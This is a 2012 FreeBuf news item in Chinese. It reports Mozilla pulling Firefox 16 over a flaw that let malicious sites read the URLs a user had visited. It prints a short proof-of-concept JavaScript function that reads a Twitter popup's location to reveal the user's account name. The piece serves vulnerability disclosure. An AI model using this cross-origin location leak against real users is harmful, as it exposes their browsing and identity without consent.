freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Firefox 16漏洞的攻击代码公开
2012-10-15 10:13:30
就在Mozilla发布了正式版Firefox 16之后没几天,该公司对外发布消息--将暂时从Mozilla下载主页移除最新版本浏览器的下载,而这么做的原因源自于存在于其中的一个安全漏洞。Mozilla公司方面表示也会尽快地修复这一漏洞。从“移除”这一举动来看,此次的安全漏洞绝非小事,不过到目前为止还没有任何详细的消息公布。

早前,Mozilla安全保障部门的总监Michael Coates在网站上写道,“此次发现的漏洞将很可能导致一个恶意网站可以收集到用户访问过的网站、URL极其参数,到目前为止我们并没有发现有相关用户受到该漏洞的影响报告。”

另外,Mozilla建议用户可以将最新版的Firefox 16降级到15.0.1版本。

攻击代码:

function poc(){ 
var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200, height=200'); 
setTimeout(function(){ 
alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1]) }, 5000);
 }

本文作者:, 转载请注明来自FreeBuf.COM

被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦
收入专辑